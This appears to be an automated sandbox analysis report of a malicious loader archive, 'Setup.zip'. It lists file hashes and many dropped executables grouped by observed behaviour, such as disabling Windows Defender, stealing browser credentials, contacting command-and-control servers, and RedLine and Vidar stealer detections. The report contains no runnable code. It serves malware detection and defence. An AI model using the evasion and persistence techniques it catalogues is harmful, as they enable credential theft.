| File name: | Setup.zip |
| Full analysis: | https://app.any.run/tasks/d45d9345-4936-4e58-8777-33b63ad0a21b |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | December 16, 2021, 01:19:42 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | CF63DE0F5BBC66C07C7C236A2AD24523 |
| SHA1: | 85A3E4B8BF39D92BCE2809BD6C1ED3435E3CB0A4 |
| SHA256: | 78428E6260C0D5410B7E5102FE41F47A59013203C6A29347D413B99360C6A9A0 |
| SSDEEP: | 3072:XFyNbsqQKRtPfl+6pkew+uPmBDYWkrRopjVPzX7:XFI+KRtXq1rRoLrX7 |
MALICIOUS
Application was dropped or rewritten from another process
- Setup.exe (PID: 1636)
- AsyncMine_1_2.exe (PID: 1176)
- NBNmjQ0PRrNpvrpQb8ylIibd.exe (PID: 3976)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- TEel0fidF7_YgSRNQrDtgCCC.exe (PID: 444)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- QFtY3eEcsvmtVj747H4j495k.exe (PID: 2312)
- bIxCwXXP0TA6TyNDUsPvGUzu.exe (PID: 2424)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- QFtY3eEcsvmtVj747H4j495k.exe (PID: 2276)
- vKql9DCdMxD0yjgIO7qbyTTd.exe (PID: 2884)
- lXQ9dyZfwvUfRCkHEMqCyPGv.exe (PID: 1380)
- foldershare.exe (PID: 3400)
- Qemaepivaesha.exe (PID: 1768)
- Niluxudico.exe (PID: 2604)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2332)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2468)
- lilin.exe (PID: 372)
- lilin.exe (PID: 3748)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- FolderShare.exe (PID: 2552)
- installer.exe (PID: 2632)
- 0lf1G9QlHisSXutICmw2bkOf.exe (PID: 412)
- ZCJQBxDe1bLl.exE (PID: 3704)
- BumperWW.exe (PID: 5220)
- 96947629151.exe (PID: 4920)
- chrome.exe (PID: 3436)
- setup1.exe (PID: 3464)
- OneCleanerInst813932.exe (PID: 3480)
- chrome1.exe (PID: 4248)
- askelp.exe (PID: 3008)
- Calculator Installation.exe (PID: 4476)
- setup.exe (PID: 828)
- inst.exe (PID: 3356)
- Newboxstudio.exe (PID: 2384)
- Proxypub.exe (PID: 2692)
- chrome2.exe (PID: 4804)
- chrome update.exe (PID: 2588)
- ujeXFnaZ3NsF05QztrTFkD9_.exe (PID: 5576)
- logger.exe (PID: 5908)
- raconnn.exe (PID: 2524)
- 14322253719.exe (PID: 4936)
- Leshytilywe.exe (PID: 5092)
- a850ef62-9739-4403-99e3-7f9c3ab9692f.exe (PID: 3904)
- DZ_QASMvzNZcN_9_go5uRrVJ.exe (PID: 1148)
- r8t1Mb9sCBs3VxTT_JKmEXIR.exe (PID: 928)
- Install.exe (PID: 3856)
- C8UmKd0uB6mRyXSrLFpBgDk6.exe (PID: 4244)
- LzmwAqmV.exe (PID: 3656)
- 57340180510.exe (PID: 2148)
- Install.exe (PID: 5584)
- Qivoxeretae.exe (PID: 484)
- 9da88be0-819a-4967-bc32-936d4bb8bb40.exe (PID: 3272)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5328)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5468)
- LzmwAqmV.exe (PID: 860)
- AqWIul494CZU3PlpI_cKUJZ5.exe (PID: 4844)
- vti6ecajh4PjzQ10TDhAk7Lj.exe (PID: 5524)
- waCbPDu0icwnYAROhK6VyAOb.exe (PID: 5388)
- 8923b757-261c-4b6f-a467-9055de3c8cce.exe (PID: 5700)
- 66fc031b-93be-410a-ac37-f3c466d7ef42.exe (PID: 4440)
Drops executable file immediately after starts
- Setup.exe (PID: 1636)
- NBNmjQ0PRrNpvrpQb8ylIibd.exe (PID: 3976)
- vKql9DCdMxD0yjgIO7qbyTTd.exe (PID: 2884)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- lXQ9dyZfwvUfRCkHEMqCyPGv.exe (PID: 1380)
- foldershare.exe (PID: 3400)
- foldershare.tmp (PID: 3968)
- cmd.exe (PID: 3820)
- cmd.exe (PID: 3404)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
Disables Windows Defender
- AsyncMine_1_2.exe (PID: 1176)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- BumperWW.exe (PID: 5220)
Changes settings of System certificates
- AsyncMine_1_2.exe (PID: 1176)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- chrome update.exe (PID: 2588)
Actions looks like stealing of personal data
- svchost.exe (PID: 876)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- Newboxstudio.exe (PID: 2384)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- a850ef62-9739-4403-99e3-7f9c3ab9692f.exe (PID: 3904)
- 9da88be0-819a-4967-bc32-936d4bb8bb40.exe (PID: 3272)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
Connects to CnC server
- AsyncMine_1_2.exe (PID: 1176)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 4032)
- BumperWW.exe (PID: 5220)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
REDLINE was detected
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 4032)
VIDAR was detected
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Steals credentials from Web Browsers
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- Newboxstudio.exe (PID: 2384)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
Stealing of credential data
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Loads dropped or rewritten executable
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- rundll32.exe (PID: 4092)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- MsiExec.exe (PID: 1588)
- installer.exe (PID: 2632)
- Newboxstudio.exe (PID: 2384)
- rundll32.exe (PID: 4192)
Changes the autorun value in the registry
- FolderShare.exe (PID: 1512)
- FolderShare.exe (PID: 3772)
Uses Task Scheduler to autorun other applications
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
Uses Task Scheduler to run other applications
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- Install.exe (PID: 5584)
Application was injected by another process
- svchost.exe (PID: 876)
Runs injected code in another process
- rundll32.exe (PID: 4092)
- rundll32.exe (PID: 4192)
Loads the Task Scheduler COM API
- schtasks.exe (PID: 3276)
- schtasks.exe (PID: 1644)
- schtasks.exe (PID: 2448)
SUSPICIOUS
Checks supported languages
- WinRAR.exe (PID: 3448)
- Setup.exe (PID: 1636)
- AsyncMine_1_2.exe (PID: 1176)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- QFtY3eEcsvmtVj747H4j495k.exe (PID: 2312)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- NBNmjQ0PRrNpvrpQb8ylIibd.exe (PID: 3976)
- TEel0fidF7_YgSRNQrDtgCCC.exe (PID: 444)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- bIxCwXXP0TA6TyNDUsPvGUzu.exe (PID: 2424)
- QFtY3eEcsvmtVj747H4j495k.exe (PID: 2276)
- vKql9DCdMxD0yjgIO7qbyTTd.exe (PID: 2884)
- lXQ9dyZfwvUfRCkHEMqCyPGv.exe (PID: 1380)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- FolderShare.exe (PID: 1512)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- cmd.exe (PID: 3236)
- Qemaepivaesha.exe (PID: 1768)
- Niluxudico.exe (PID: 2604)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2468)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2332)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- foldershare.exe (PID: 3400)
- foldershare.tmp (PID: 3968)
- FolderShare.exe (PID: 2552)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 0lf1G9QlHisSXutICmw2bkOf.exe (PID: 412)
- mshta.exe (PID: 372)
- cmd.exe (PID: 3820)
- cmd.exe (PID: 3404)
- mshta.exe (PID: 2128)
- ZCJQBxDe1bLl.exE (PID: 3704)
- mshta.exe (PID: 628)
- cmd.exe (PID: 2372)
- cmd.exe (PID: 3908)
- cmd.exe (PID: 2200)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- _5AGXihLz2RC95bdf_Dx2ig9.exe (PID: 860)
- OneCleanerInst813932.exe (PID: 3480)
- lilin.exe (PID: 372)
- Proxypub.exe (PID: 2692)
- lilin.exe (PID: 3748)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- inst.exe (PID: 3356)
- cmd.exe (PID: 2444)
- installer.exe (PID: 2632)
- Newboxstudio.exe (PID: 2384)
- setup.exe (PID: 828)
- setup1.exe (PID: 3464)
- FolderShare.exe (PID: 3772)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- r8t1Mb9sCBs3VxTT_JKmEXIR.exe (PID: 928)
- oZBWII6stHEd9ZxIcJVjlJft.exe (PID: 3696)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 1328)
- svchost.exe (PID: 876)
- askelp.exe (PID: 3008)
- chrome update.exe (PID: 2588)
- Install.exe (PID: 3856)
- raconnn.exe (PID: 2524)
- Calculator Installation.exe (PID: 4476)
- cmd.exe (PID: 2904)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- cR6mitGiqjapqPvPC8qOg2MY.exe (PID: 5420)
- BumperWW.exe (PID: 5220)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- logger.exe (PID: 5908)
- chrome.exe (PID: 3436)
- chrome1.exe (PID: 4248)
- cmd.exe (PID: 1924)
- 96947629151.exe (PID: 4920)
- chrome2.exe (PID: 4804)
- Install.exe (PID: 5584)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 4032)
- cmd.exe (PID: 6128)
- powershell.exe (PID: 4296)
- ujeXFnaZ3NsF05QztrTFkD9_.exe (PID: 5576)
- WMIC.exe (PID: 6012)
- powershell.exe (PID: 4888)
- WMIC.exe (PID: 4176)
- cmd.exe (PID: 348)
- powershell.exe (PID: 2432)
- 14322253719.exe (PID: 4936)
- a850ef62-9739-4403-99e3-7f9c3ab9692f.exe (PID: 3904)
- Leshytilywe.exe (PID: 5092)
- WMIC.exe (PID: 5392)
- powershell.exe (PID: 4092)
- DZ_QASMvzNZcN_9_go5uRrVJ.exe (PID: 1148)
- 9da88be0-819a-4967-bc32-936d4bb8bb40.exe (PID: 3272)
- EDqJxKMYjQLhJ2fJ1R_i0a3Z.exe (PID: 3544)
- C8UmKd0uB6mRyXSrLFpBgDk6.exe (PID: 4244)
- LzmwAqmV.exe (PID: 3656)
- GZ92lqS7Gxt1JAUCac32T9W4.exe (PID: 4872)
- cmd.exe (PID: 5316)
- cmd.exe (PID: 4864)
- Qivoxeretae.exe (PID: 484)
- 57340180510.exe (PID: 2148)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5328)
- cmd.exe (PID: 1132)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5468)
- 66fc031b-93be-410a-ac37-f3c466d7ef42.exe (PID: 4440)
- waCbPDu0icwnYAROhK6VyAOb.exe (PID: 5388)
- LzmwAqmV.exe (PID: 860)
- 8923b757-261c-4b6f-a467-9055de3c8cce.exe (PID: 5700)
- AqWIul494CZU3PlpI_cKUJZ5.exe (PID: 4844)
- vti6ecajh4PjzQ10TDhAk7Lj.exe (PID: 5524)
Reads the computer name
- WinRAR.exe (PID: 3448)
- Setup.exe (PID: 1636)
- AsyncMine_1_2.exe (PID: 1176)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- bIxCwXXP0TA6TyNDUsPvGUzu.exe (PID: 2424)
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- FolderShare.exe (PID: 1512)
- Niluxudico.exe (PID: 2604)
- Qemaepivaesha.exe (PID: 1768)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2332)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2468)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- foldershare.tmp (PID: 3968)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 0lf1G9QlHisSXutICmw2bkOf.exe (PID: 412)
- FolderShare.exe (PID: 2552)
- mshta.exe (PID: 372)
- ZCJQBxDe1bLl.exE (PID: 3704)
- mshta.exe (PID: 2128)
- mshta.exe (PID: 628)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- _5AGXihLz2RC95bdf_Dx2ig9.exe (PID: 860)
- OneCleanerInst813932.exe (PID: 3480)
- lilin.exe (PID: 372)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- installer.exe (PID: 2632)
- lilin.exe (PID: 3748)
- setup1.exe (PID: 3464)
- FolderShare.exe (PID: 3772)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 1328)
- oZBWII6stHEd9ZxIcJVjlJft.exe (PID: 3696)
- askelp.exe (PID: 3008)
- chrome update.exe (PID: 2588)
- raconnn.exe (PID: 2524)
- Calculator Installation.exe (PID: 4476)
- cR6mitGiqjapqPvPC8qOg2MY.exe (PID: 5420)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- logger.exe (PID: 5908)
- chrome.exe (PID: 3436)
- chrome1.exe (PID: 4248)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- BumperWW.exe (PID: 5220)
- chrome2.exe (PID: 4804)
- 96947629151.exe (PID: 4920)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 4032)
- Install.exe (PID: 5584)
- setup.exe (PID: 828)
- powershell.exe (PID: 4296)
- WMIC.exe (PID: 6012)
- Newboxstudio.exe (PID: 2384)
- powershell.exe (PID: 4888)
- Proxypub.exe (PID: 2692)
- WMIC.exe (PID: 4176)
- powershell.exe (PID: 2432)
- a850ef62-9739-4403-99e3-7f9c3ab9692f.exe (PID: 3904)
- Leshytilywe.exe (PID: 5092)
- WMIC.exe (PID: 5392)
- 9da88be0-819a-4967-bc32-936d4bb8bb40.exe (PID: 3272)
- powershell.exe (PID: 4092)
- LzmwAqmV.exe (PID: 3656)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5328)
- 66fc031b-93be-410a-ac37-f3c466d7ef42.exe (PID: 4440)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5468)
- LzmwAqmV.exe (PID: 860)
- Qivoxeretae.exe (PID: 484)
- waCbPDu0icwnYAROhK6VyAOb.exe (PID: 5388)
- 8923b757-261c-4b6f-a467-9055de3c8cce.exe (PID: 5700)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 3448)
- Setup.exe (PID: 1636)
- AsyncMine_1_2.exe (PID: 1176)
- NBNmjQ0PRrNpvrpQb8ylIibd.exe (PID: 3976)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.exe (PID: 1380)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- vKql9DCdMxD0yjgIO7qbyTTd.exe (PID: 2884)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- FolderShare.exe (PID: 1512)
- foldershare.exe (PID: 3400)
- foldershare.tmp (PID: 3968)
- cmd.exe (PID: 3820)
- cmd.exe (PID: 3404)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2332)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- Niluxudico.exe (PID: 2604)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- r8t1Mb9sCBs3VxTT_JKmEXIR.exe (PID: 928)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Install.exe (PID: 3856)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- installer.exe (PID: 2632)
- msiexec.exe (PID: 4824)
- OneCleanerInst813932.exe (PID: 3480)
- FolderShare.exe (PID: 3772)
- setup1.exe (PID: 3464)
- cR6mitGiqjapqPvPC8qOg2MY.exe (PID: 5420)
- BumperWW.exe (PID: 5220)
- 14322253719.exe (PID: 4936)
- Install.exe (PID: 5584)
- Qivoxeretae.exe (PID: 484)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- Calculator Installation.exe (PID: 4476)
Drops a file with a compile date too recent
- WinRAR.exe (PID: 3448)
- Setup.exe (PID: 1636)
- AsyncMine_1_2.exe (PID: 1176)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- FolderShare.exe (PID: 1512)
- ZCJQBxDe1bLl.exE (PID: 3704)
- cmd.exe (PID: 3404)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2332)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- Niluxudico.exe (PID: 2604)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- OneCleanerInst813932.exe (PID: 3480)
- FolderShare.exe (PID: 3772)
- setup1.exe (PID: 3464)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- cR6mitGiqjapqPvPC8qOg2MY.exe (PID: 5420)
- BumperWW.exe (PID: 5220)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
Adds / modifies Windows certificates
- AsyncMine_1_2.exe (PID: 1176)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- chrome update.exe (PID: 2588)
Checks for external IP
- AsyncMine_1_2.exe (PID: 1176)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- BumperWW.exe (PID: 5220)
Drops a file that was compiled in debug mode
- AsyncMine_1_2.exe (PID: 1176)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- FolderShare.exe (PID: 1512)
- foldershare.tmp (PID: 3968)
- cmd.exe (PID: 3820)
- Niluxudico.exe (PID: 2604)
- XK6wgCfZdyHb3seOleDFeXN1.exe (PID: 2768)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- installer.exe (PID: 2632)
- FolderShare.exe (PID: 3772)
- setup1.exe (PID: 3464)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- msiexec.exe (PID: 4824)
- BumperWW.exe (PID: 5220)
- 14322253719.exe (PID: 4936)
Application launched itself
- QFtY3eEcsvmtVj747H4j495k.exe (PID: 2312)
- 29zDEfns9vHDdGfB5kWbWOfp.exe (PID: 2468)
- cmd.exe (PID: 3404)
- lilin.exe (PID: 372)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 1328)
- msiexec.exe (PID: 4824)
- fU1czwh5LB0BNqqxXep7sypr.exe (PID: 5328)
Reads Environment values
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- FolderShare.exe (PID: 1512)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- Niluxudico.exe (PID: 2604)
- Qemaepivaesha.exe (PID: 1768)
- OneCleanerInst813932.exe (PID: 3480)
- _5AGXihLz2RC95bdf_Dx2ig9.exe (PID: 860)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- installer.exe (PID: 2632)
- setup1.exe (PID: 3464)
- FolderShare.exe (PID: 3772)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- chrome update.exe (PID: 2588)
- askelp.exe (PID: 3008)
- raconnn.exe (PID: 2524)
- logger.exe (PID: 5908)
- cR6mitGiqjapqPvPC8qOg2MY.exe (PID: 5420)
- chrome.exe (PID: 3436)
- chrome1.exe (PID: 4248)
- chrome2.exe (PID: 4804)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- MsiExec.exe (PID: 1588)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- Newboxstudio.exe (PID: 2384)
- Leshytilywe.exe (PID: 5092)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- CgZQmcVVAbvPXpSqA6PFQNHb.exe (PID: 4032)
- Qivoxeretae.exe (PID: 484)
- waCbPDu0icwnYAROhK6VyAOb.exe (PID: 5388)
Drops a file with too old compile date
- AsyncMine_1_2.exe (PID: 1176)
- vKql9DCdMxD0yjgIO7qbyTTd.exe (PID: 2884)
- lXQ9dyZfwvUfRCkHEMqCyPGv.exe (PID: 1380)
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- FolderShare.exe (PID: 1512)
- foldershare.tmp (PID: 3968)
- foldershare.exe (PID: 3400)
- tfyqiZIqIjaTrJkYymoJU90n.exe (PID: 2244)
- FolderShare.exe (PID: 3772)
- BumperWW.exe (PID: 5220)
Reads Windows owner or organization settings
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- foldershare.tmp (PID: 3968)
- installer.exe (PID: 2632)
- msiexec.exe (PID: 4824)
Reads the Windows organization settings
- vKql9DCdMxD0yjgIO7qbyTTd.tmp (PID: 3048)
- lXQ9dyZfwvUfRCkHEMqCyPGv.tmp (PID: 3340)
- foldershare.tmp (PID: 3968)
- installer.exe (PID: 2632)
- msiexec.exe (PID: 4824)
Creates files in the program directory
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Reads the cookies of Mozilla Firefox
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
Reads the cookies of Google Chrome
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
Reads CPU info
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Searches for installed software
- ctLD0J8HU1cVdPohy6H8YwI4.exe (PID: 2800)
- Ls6g86fBj3MIKYmwTS94mNCw.exe (PID: 1696)
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- xmpJ1VzuLsSWajzUJWNkOTKc.exe (PID: 3072)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- lTsqCmYjZqkVgaWdnLkCWqev.exe (PID: 1248)
- 6LxoqUw6xcX7MyMun0SBqE3x.exe (PID: 3896)
- Newboxstudio.exe (PID: 2384)
- xQToRGLk08uZyFwmvXF1BuzW.exe (PID: 5604)
- b7augmLGu6Q6xfa9qIvw5JkA.exe (PID: 5084)
Starts CMD.EXE for commands execution
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- mshta.exe (PID: 372)
- mshta.exe (PID: 2128)
- mshta.exe (PID: 628)
- cmd.exe (PID: 3404)
- Niluxudico.exe (PID: 2604)
- _jG1MV_YeMvA5F9ddO9inwmT.exe (PID: 2068)
- Install.exe (PID: 5584)
- forfiles.exe (PID: 2452)
- forfiles.exe (PID: 5028)
- forfiles.exe (PID: 5724)
- forfiles.exe (PID: 2956)
- forfiles.exe (PID: 740)
- forfiles.exe (PID: 3072)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Uses TASKKILL.EXE to kill process
- cmd.exe (PID: 3236)
- cmd.exe (PID: 3820)
- cmd.exe (PID: 5316)
- cmd.exe (PID: 1132)
Starts CMD.EXE for self-deleting
- 86eZaE9j7caNSaH9ls8SzEXN.exe (PID: 1212)
- 3j2C8QZQWs8esPQR2Psm3IJx.exe (PID: 1484)
- Newboxstudio.exe (PID: 2384)
Creates a directory in Program Files
- FolderShare.exe (PID: 1512)
- foldershare.tmp (PID: 3968)
- nLb899D3iUssa6rxU7dckY5h.exe (PID: 4060)
- FolderShare.exe (PID: 3772)
Starts Internet Explorer
